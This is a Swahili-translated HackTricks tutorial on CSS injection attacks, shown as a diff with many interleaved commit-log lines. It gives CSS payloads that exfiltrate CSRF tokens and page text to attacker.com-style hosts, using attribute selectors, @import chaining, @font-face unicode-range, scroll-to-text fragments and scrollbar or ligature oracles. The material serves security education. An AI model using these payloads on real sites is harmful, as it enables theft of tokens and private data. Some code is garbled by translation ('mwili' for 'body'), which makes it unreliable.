+								* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								**Kikundi cha Usalama cha Kujitahidi Kwa Bidii**
 								<figure><img src="../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
 								{% embed url="https://discord.gg/tryhardsecurity" %}
 								***
 								## Kuingiza CSS
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								### Chaguo la Sifa
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Vichaguzi vya CSS vimeundwa kulingana na thamani za sifa za `jina` na `thamani` ya kipengele cha `input`. Ikiwa thamani ya sifa ya kipengele cha `input` inaanza na herufi maalum, rasilimali ya nje iliyopangwa huload:
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
+								```css
 								input[name=csrf][value^=a]{
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								background-image: url(https://attacker.com/exfil/a);
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
+								}
 								input[name=csrf][value^=b]{
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								background-image: url(https://attacker.com/exfil/b);
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
+								}
 								/* ... */
 								input[name=csrf][value^=9]{
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								background-image: url(https://attacker.com/exfil/9);
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
+								}
 								```
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Hata hivyo, njia hii inakabiliwa na kikwazo wakati wa kushughulikia vipengele vya pembejeo vilivyofichwa (`type="hidden"`) kwa sababu vipengele vilivyofichwa havipakii mandharinyuma.
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								#### Kupita kwa Vipengele Vilivyofichwa
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Ili kuzunguka kikwazo hiki, unaweza kulenga kipengele cha ndugu kinachofuata kwa kutumia kielekezi cha ndugu wa jumla `~`. Sheria ya CSS basi inatumika kwa ndugu wote wanaofuata kipengele kilichofichwa cha pembejeo, ikisababisha picha ya mandharinyuma kupakia:
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
+								```css
 								input[name=csrf][value^=csrF] ~ * {
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								background-image: url(https://attacker.com/exfil/csrF);
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
+								}
 								```
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								#### Mahitaji ya Kuingiza CSS
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Ili mbinu ya Kuingiza CSS iwe na ufanisi, lazima kuna hali fulani zilizokidhi:
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+. **Urefu wa Mzigo**: Vector ya kuingiza CSS lazima iweze kusaidia mizigo ya kutosha kuingiza machaguo yaliyoundwa.
 . **Upya wa CSS**: Unapaswa kuwa na uwezo wa kuunda ukurasa, ambao ni muhimu kusababisha upya wa CSS na mizigo iliyozalishwa kwa upya.
 . **Rasilimali za Nje**: Mbinu hii inahitaji uwezo wa kutumia picha zilizohifadhiwa nje. Hii inaweza kuzuiliwa na Sera ya Usalama wa Yaliyomo (CSP) ya tovuti.
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								### Chaguo la Kipofu la Mchaguzi wa Sifa
-												GITBOOK-4185: change request with no subject merged in GitBook

											
										
										
											2023-12-11 10:10:20 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Kama [**ilivyoelezwa katika chapisho hili**](https://portswigger.net/research/blind-css-exfiltration), inawezekana kuunganisha wachaguzi **`:has`** na **`:not`** kutambua yaliyomo hata kutoka kwa vipengele vipofu. Hii ni muhimu sana unapokuwa huna wazo la kilichomo ndani ya ukurasa wa wavuti unaoingiza CSS.\
 								Pia inawezekana kutumia wachaguzi hao kutolea habari kutoka kwa vikundi kadhaa vya aina ile ile kama vile:
-												GITBOOK-4185: change request with no subject merged in GitBook

											
										
										
											2023-12-11 10:10:20 +00:00
+								```html
 								<style>
 								html:has(input[name^="m"]):not(input[name="mytoken"]) {
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								background:url(/m);
-												GITBOOK-4185: change request with no subject merged in GitBook

											
										
										
											2023-12-11 10:10:20 +00:00
+								}
 								</style>
 								<input name=mytoken value=1337>
 								<input name=myname value=gareth>
 								```
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Kwa kuunganisha hii na **mbinu ya @import** ifuatayo, niwezekanavyo kuchota **maarifa mengi kwa kutumia CSS injection kutoka kurasa za vipofu na** [**blind-css-exfiltration**](https://github.com/hackvertor/blind-css-exfiltration)**.**
-												GITBOOK-4185: change request with no subject merged in GitBook

											
										
										
											2023-12-11 10:10:20 +00:00
-												GitBook: [#3288] No subject

											
										
										
											2022-06-27 23:34:20 +00:00
+								### @import
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Mbinu ya awali ina mapungufu fulani, angalia vigezo. Unahitaji kuwa na uwezo wa **kupeleka viungo vingi kwa muathiriwa**, au unahitaji kuwa na uwezo wa **kuweka CSS injection katika ukurasa unaoweza kudhurika na iframe**.
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Hata hivyo, kuna mbinu nyingine nzuri inayotumia **CSS `@import`** kuboresha ubora wa mbinu.
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								Hii ilionyeshwa kwanza na [**Pepe Vila**](https://vwzq.net/slides/2019-s3\_css\_injection\_attacks.pdf) na inafanya kazi kama ifuatavyo:
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Badala ya kupakia ukurasa huo mara kwa mara na zaidi ya payloads tofauti kila wakati (kama ilivyokuwa hapo awali), tutakuwa **tunapakia ukurasa mara moja tu na kwa kuingiza kwa seva ya mshambuliaji** (hii ndio payload ya kutuma kwa muathiriwa):
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
+								```css
 								@import url('//attacker.com:5001/start?');
 								```
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+. Import itapokea **CSS script** kutoka kwa wachomozaji na **kivinjari kitaiload**.
 . Sehemu ya kwanza ya CSS script wachomozaji watatuma ni **`@import` nyingine kwa server ya wachomozaji tena**.
 . Server ya wachomozaji haitajibu ombi hili bado, kwani tunataka kuvuja herufi fulani kisha kujibu ombi hili na mzigo wa kuvuja wengine.
 . Sehemu ya pili na kubwa ya mzigo itakuwa **mzigo wa kuvuja wa chaguo la sifa**.
 . Hii itatuma kwa server ya wachomozaji **herufi ya kwanza ya siri na ya mwisho**.
 . Mara server ya wachomozaji imepokea **herufi ya kwanza na ya mwisho ya siri**, itajibu **import iliyotakiwa katika hatua ya 2**.
 . Majibu yatakuwa sawa na **hatua 2, 3 na 4**, lakini wakati huu itajaribu **kupata herufi ya pili ya siri na kisha ya pili kutoka mwisho**.
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Mchomozaji ataendelea **mpaka afanikiwe kuvuja siri kabisa**.
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Unaweza kupata [**msimbo wa Pepe Vila wa kutumia hii hapa**](https://gist.github.com/cgvwzq/6260f0f0a47c009c87b4d46ce3808231) au unaweza kupata karibu [**mimso wa msimbo lakini ulioandikwa hapa**.](./#css-injection)
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
 								{% hint style="info" %}
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Msimbo utajaribu kugundua herufi 2 kila wakati (kutoka mwanzoni na mwishoni) kwa sababu chaguo la sifa linaruhusu kufanya mambo kama:
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
+								```css
 								/* value^=  to match the beggining of the value*/
 								input[value^="0"]{--s0:url(http://localhost:5001/leak?pre=0)}
 								/* value$=  to match the ending of the value*/
 								input[value$="f"]{--e0:url(http://localhost:5001/leak?post=f)}
 								```
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Hii inaruhusu script kuvuja siri haraka.
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
+								{% endhint %}
 								{% hint style="warning" %}
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Wakati mwingine script **haigundui kwa usahihi kwamba kipimo cha awali + kipimo cha mwisho kilichopatikana tayari ni bendera kamili** na itaendelea mbele (kwenye kipimo cha awali) na nyuma (kwenye kipimo cha mwisho) na wakati fulani itasimama.\
 								Usiwe na wasiwasi, tuangalie **matokeo** kwa sababu **unaweza kuona bendera hapo**.
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
+								{% endhint %}
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								### Selectors Nyingine
-												GitBook: [#3344] No subject

											
										
										
											2022-08-01 23:17:26 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Njia nyingine za kufikia sehemu za DOM na **vichaguzi vya CSS**:
-												GitBook: [#3344] No subject

											
										
										
											2022-08-01 23:17:26 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								* **`.class-to-search:nth-child(2)`**: Hii itatafuta kipengee cha pili chenye darasa "class-to-search" kwenye DOM.
 								*   Chaguzi ya **`:empty`**: Hutumiwa kwa mfano katika [**hii writeup**](https://github.com/b14d35/CTF-Writeups/tree/master/bi0sCTF%202022/Emo-Locker)**:**
-												GitBook: [#3759] No subject

											
										
										
											2023-01-22 23:19:55 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								```css
 								[role^="img"][aria-label="1"]:empty { background-image: url("YOUR_SERVER_URL?1"); }
 								```
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								### XS-Search Inayotegemea Makosa
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								**Marejeo:** [Shambulio la Kulingana na CSS: Kutumia unicode-range ya @font-face](https://mksben.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html), [XS-Search PoC Inayotegemea Makosa na @terjanq](https://twitter.com/terjanq/status/1180477124861407234)
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Nia kuu ni **kutumia fonti ya desturi kutoka kwa kituo kilichodhibitiwa** na kuhakikisha kwamba **maandishi (katika kesi hii, 'A') yanavyoonyeshwa na fonti hii tu ikiwa rasilimali iliyotajwa (`favicon.ico`) haiwezi kupakia**.
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
+								```html
 								<!DOCTYPE html>
 								<html>
 								<head>
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								<style>
 								@font-face{
 								font-family: poc;
 								src: url(http://attacker.com/?leak);
 								unicode-range:U+0041;
 								}
 								#poc0{
 								font-family: 'poc';
 								}
 								</style>
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
+								</head>
 								<body>
 								<object id="poc0" data="http://192.168.0.1/favicon.ico">A</object>
 								</body>
 								</html>
 								```
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+. **Matumizi ya Fonti ya Kipekee**:
 								   - Fonti ya kipekee inadefiniwa kwa kutumia sheria ya `@font-face` ndani ya lebo ya `<style>` katika sehemu ya `<head>`.
 								   - Fonti inaitwa `poc` na inapakuliwa kutoka kwa mwisho wa nje (`http://attacker.com/?leak`).
 								   - Mali ya `unicode-range` imewekwa kuwa `U+0041`, ikilenga herufi maalum ya Unicode 'A'.
 . **Kipengele cha Kitu na Nakala ya Mbadala**:
 								   - Kipengele cha `<object>` chenye `id="poc0"` kinajengwa katika sehemu ya `<body>`. Kipengele hiki kinajaribu kupakia rasilimali kutoka `http://192.168.0.1/favicon.ico`.
 								   - `font-family` kwa kipengele hiki imewekwa kuwa `'poc'`, kama ilivyoelezwa katika sehemu ya `<style>`.
 								   - Ikiwa rasilimali (`favicon.ico`) haiwezi kupakia, maudhui ya mbadala (herufi 'A') ndani ya lebo ya `<object>` yataonyeshwa.
 								   - Maudhui ya mbadala ('A') yatachorwa kutumia fonti ya kipekee `poc` ikiwa rasilimali ya nje haiwezi kupakia.
-												GITBOOK-4031: change request with no subject merged in GitBook

											
										
										
											2023-08-15 01:35:49 +00:00
+								```css
-												GitBook: [#3313] No subject

											
										
										
											2022-07-10 22:26:52 +00:00
+								:target::before { content : url(target.png) }
 								```
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Katika hali kama hizo, ikiwa maandishi "Msimamizi" yapo kwenye ukurasa, rasilimali `target.png` inaombwa kutoka kwenye seva, ikionyesha uwepo wa maandishi hayo. Kisa cha shambulio hili kinaweza kutekelezwa kupitia URL iliyoundwa kwa uangalifu ambayo inaingiza CSS iliyoinuliwa pamoja na kipande cha maandishi ya kusogeza:
-												GitBook: [#3313] No subject

											
										
										
											2022-07-10 22:26:52 +00:00
+								```
 								http://127.0.0.1:8081/poc1.php?note=%3Cstyle%3E:target::before%20{%20content%20:%20url(http://attackers-domain/?confirmed_existence_of_Administrator_username)%20}%3C/style%3E#:~:text=Administrator
 								```
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Hapa, shambulio linabadilisha uingizaji wa HTML ili kuhamisha nambari ya CSS, lengo likiwa ni maandishi maalum "Msimamizi" kupitia kipande cha Scroll-to-text (`#:~:text=Administrator`). Ikiwa maandishi yamepatikana, rasilimali iliyoelekezwa hupakiwa, ikionyesha uwepo wake kwa bahati mbaya kwa muhusika.
-												GitBook: [#3313] No subject

											
										
										
											2022-07-10 22:26:52 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Kwa kupunguza madhara, mambo yafuatayo yanapaswa kuzingatiwa:
-												GitBook: [#3313] No subject

											
										
										
											2022-07-10 22:26:52 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+. **Ulinganishi wa STTF uliopunguzwa**: Kipande cha Scroll-to-text Fragment (STTF) kimeundwa kulinganisha tu maneno au sentensi, hivyo kupunguza uwezo wake wa kufichua siri au vitambulisho vya aina yoyote.
 . **Kizuizi kwa Muktadha wa Kivinjari cha Juu**: STTF inafanya kazi tu katika muktadha wa juu wa kivinjari na haifanyi kazi ndani ya iframes, hivyo kufanya jaribio lolote la unyonyaji kuwa dhahiri zaidi kwa mtumiaji.
 . **Hitaji la Kuchochewa na Mtumiaji**: STTF inahitaji ishara ya kuchochewa na mtumiaji ili kufanya kazi, maana yake unyonyaji unawezekana tu kupitia urambazaji ulioanzishwa na mtumiaji. Mahitaji haya yanapunguza kwa kiasi kikubwa hatari ya mashambulizi kufanywa kiotomatiki bila ushirikiano wa mtumiaji. Hata hivyo, mwandishi wa chapisho la blogu anabainisha hali maalum na njia za kuepuka (k.m., uhandisi wa kijamii, mwingiliano na programu-jalizi maarufu za kivinjari) ambazo zinaweza kufanya unyonyaji kuwa rahisi.
-												GitBook: [#3313] No subject

											
										
										
											2022-07-10 22:26:52 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Kuwa na ufahamu wa mifumo hii na mapungufu yanayowezekana ni muhimu kwa kudumisha usalama wa wavuti na kulinda dhidi ya mikakati ya unyonyaji kama hiyo.
-												GitBook: [#3313] No subject

											
										
										
											2022-07-10 22:26:52 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Kwa maelezo zaidi angalia ripoti asili: [https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/](https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/)
-												GitBook: [#3313] No subject

											
										
										
											2022-07-10 22:26:52 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Unaweza kuangalia [**kutumia mbinu hii kwa CTF hapa**](https://gist.github.com/haqpl/52455c8ddfec33aeefb468301d70b6eb).
-												GITBOOK-4031: change request with no subject merged in GitBook

											
										
										
											2023-08-15 01:35:49 +00:00
-												GitBook: [#3288] No subject

											
										
										
											2022-06-27 23:34:20 +00:00
+								### @font-face / unicode-range <a href="#text-node-exfiltration-i-ligatures" id="text-node-exfiltration-i-ligatures"></a>
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Unaweza kubainisha **fonti za nje kwa thamani maalum za unicode** ambazo zitakusanywa tu **ikiwa thamani hizo za unicode zitapatikana** kwenye ukurasa. Kwa mfano:
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
+								```html
 								<style>
 								@font-face{
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								font-family:poc;
 								src: url(http://attacker.example.com/?A); /* fetched */
 								unicode-range:U+0041;
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
+								}
 								@font-face{
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								font-family:poc;
 								src: url(http://attacker.example.com/?B); /* fetched too */
 								unicode-range:U+0042;
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
+								}
 								@font-face{
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								font-family:poc;
 								src: url(http://attacker.example.com/?C); /* not fetched */
 								unicode-range:U+0043;
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
+								}
 								#sensitive-information{
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								font-family:poc;
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
+								}
 								</style>
 								<p id="sensitive-information">AB</p>htm
 								```
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								### Uchomaji wa nodi ya maandishi (I): ligatures <a href="#uchomaji-wa-nodi-ya-maandishi-i-ligatures" id="uchomaji-wa-nodi-ya-maandishi-i-ligatures"></a>
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								**Kumbukumbu:** [Wykradanie danych w świetnym stylu – czyli jak wykorzystać CSS-y do ataków na webaplikację](https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-wykorzystac-css-y-do-atakow-na-webaplikacje/)
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Mbinu iliyoelezwa inahusisha kutoa maandishi kutoka kwa nodi kwa kutumia ligatures ya fonti na kufuatilia mabadiliko ya upana. Mchakato unajumuisha hatua kadhaa:
-												a

											
										
										
											2024-02-05 02:29:11 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+. **Uundaji wa Fonti za Desturi**:
 								- Fonti za SVG zinatengenezwa na glyphs zenye sifa ya `horiz-adv-x`, ambayo huanzisha upana mkubwa kwa glyph inayowakilisha mfululizo wa wahusika wawili.
 								- Mfano wa glyph ya SVG: `<glyph unicode="XY" horiz-adv-x="8000" d="M1 0z"/>`, ambapo "XY" inaashiria mfululizo wa wahusika wawili.
 								- Fonti hizi kisha hubadilishwa kuwa muundo wa woff kwa kutumia fontforge.
-												a

											
										
										
											2024-02-05 02:29:11 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+. **Uchunguzi wa Mabadiliko ya Upana**:
 								- CSS hutumiwa kuhakikisha kuwa maandishi hayajipindi (`white-space: nowrap`) na kubinafsisha mtindo wa scrollbar.
 								- Kuonekana kwa scrollbar ya usawa, iliyopambwa kwa njia tofauti, hufanya kama kiashiria (oracle) kwamba ligature maalum, na hivyo mfululizo maalum wa wahusika, upo katika maandishi.
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								- CSS inayohusika:
 								```css
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								mwili { white-space: nowrap };
 								mwili::-webkit-scrollbar { background: blue; }
 								mwili::-webkit-scrollbar:horizontal { background: url(http://attacker.com/?leak); }
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+								```
-												a

											
										
										
											2024-02-05 02:29:11 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+. **Mchakato wa Kutumia**:
 								- **Hatua 1**: Fonti zinaundwa kwa jozi za wahusika wenye upana mkubwa.
 								- **Hatua 2**: Mbinu ya udanganyifu inatumika kutambua wakati glyph kubwa ya upana (ligature kwa jozi ya wahusika) inapojengwa, ikionyesha uwepo wa mfululizo wa wahusika.
 								- **Hatua 3**: Baada ya kutambua ligature, glyphs mpya zinazowakilisha mfululizo wa wahusika watatu zinaundwa, zikiingiza jozi iliyogunduliwa na kuongeza wahusika wa awali au wafuatao.
 								- **Hatua 4**: Uchunguzi wa ligature ya wahusika watatu unafanywa.
 								- **Hatua 5**: Mchakato unarudia, ukifunua taratibu maandishi yote.
-												a

											
										
										
											2024-02-05 02:29:11 +00:00
-												Translated to Swahili

											
										
										
											2024-02-11 02:13:58 +00:00
+. **Uboreshaji**:
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								- Mbinu ya sasa ya kuanzisha kutumia `<meta refresh=...` sio bora.
 								- Njia yenye ufanisi zaidi inaweza kuhusisha mbinu ya CSS ya `@import`, ikiboresha utendaji wa kutumia mbinu hii.
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								### Uchomaji wa nodi ya maandishi (II): kuvuja kwa seti ya wahusika na fonti ya msingi (bila kuhitaji mali za nje) <a href="#uchomaji-wa-nodi-ya-maandishi-ii-kuvuja-kwa-seti-ya-wahusika-na-fonti-ya-msingi" id="uchomaji-wa-nodi-ya-maandishi-ii-kuvuja-kwa-seti-ya-wahusika-na-fonti-ya-msingi"></a>
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								**Kumbukumbu:** [PoC using Comic Sans by @Cgvwzq & @Terjanq](https://demo.vwzq.net/css2.html)
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Ujanja huu ulitolewa katika [**Mjadala wa Slackers**](https://www.reddit.com/r/Slackers/comments/dzrx2s/what\_can\_we\_do\_with_single\_css\_injection/). Seti ya wahusika inayotumiwa katika nodi ya maandishi inaweza kuvuja **kwa kutumia fonti za msingi** zilizosanikishwa kwenye kivinjari: hakuna fonti za nje -au desturi- inahitajika.
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Mbinu hii inahusisha kutumia uhuishaji kuongeza kwa hatua kwa hatua upana wa `div`, kuruhusu wahusika mmoja baada ya mwingine kusonga kutoka sehemu ya 'suffix' ya maandishi kwenda sehemu ya 'prefix'. Mchakato huu unagawa kwa ufanisi maandishi katika sehemu mbili:
-												a

											
										
										
											2024-02-05 02:29:11 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+. **Awali**: Mstari wa kwanza.
 . **Suffix**: Mstari unaofuata.
-												a

											
										
										
											2024-02-05 02:29:11 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Hatua za mpito za wahusika zitaonekana kama ifuatavyo:
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
 								**C**\
 								ADB
 								**CA**\
 								DB
 								**CAD**\
 								B
 								**CADB**
-												a

											
										
										
											2024-02-05 02:29:11 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Wakati wa mpito huu, **njama ya unicode-range** inatumika kutambua kila wahusika mpya wanapojiunga na awali. Hii inafanikishwa kwa kubadilisha fonti kuwa Comic Sans, ambayo ni refu kuliko fonti ya msingi, hivyo kusababisha scrollbar ya wima. Kuonekana kwa scrollbar hii kunafunua kwa njia isiyo ya moja kwa moja uwepo wa wahusika wapya katika awali.
-												a

											
										
										
											2024-02-05 02:29:11 +00:00
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Ingawa mbinu hii inaruhusu kutambua wahusika wa kipekee wanapoonekana, haitoi maelezo ya ni wahusika gani wanarudiwa, tu kwamba kurudi kumetokea.
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
 								{% hint style="info" %}
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Kimsingi, **unicode-range hutumiwa kutambua wahusika**, lakini kwa kuwa hatutaki kupakia fonti ya nje, tunahitaji kupata njia nyingine.\
 								Wakati **wahusika** unapopatikana, unapewa **fonti ya Comic Sans iliyosanikishwa tayari**, ambayo **inafanya** wahusika **kuwa wakubwa** na **kuzindua scrollbar** ambayo ita**vujisha wahusika uliopatikana**.
-												GitBook: [#3087] No subject

											
										
										
											2022-04-05 22:03:49 +00:00
+								{% endhint %}
-												Translated ['README.md', 'forensics/basic-forensic-methodology/partition

											
										
										
											2024-03-14 23:40:07 +00:00
+								Angalia nambari iliyochimbuliwa kutoka kwa PoC:
-												GitBook: [#3087] No subject

											
										
										
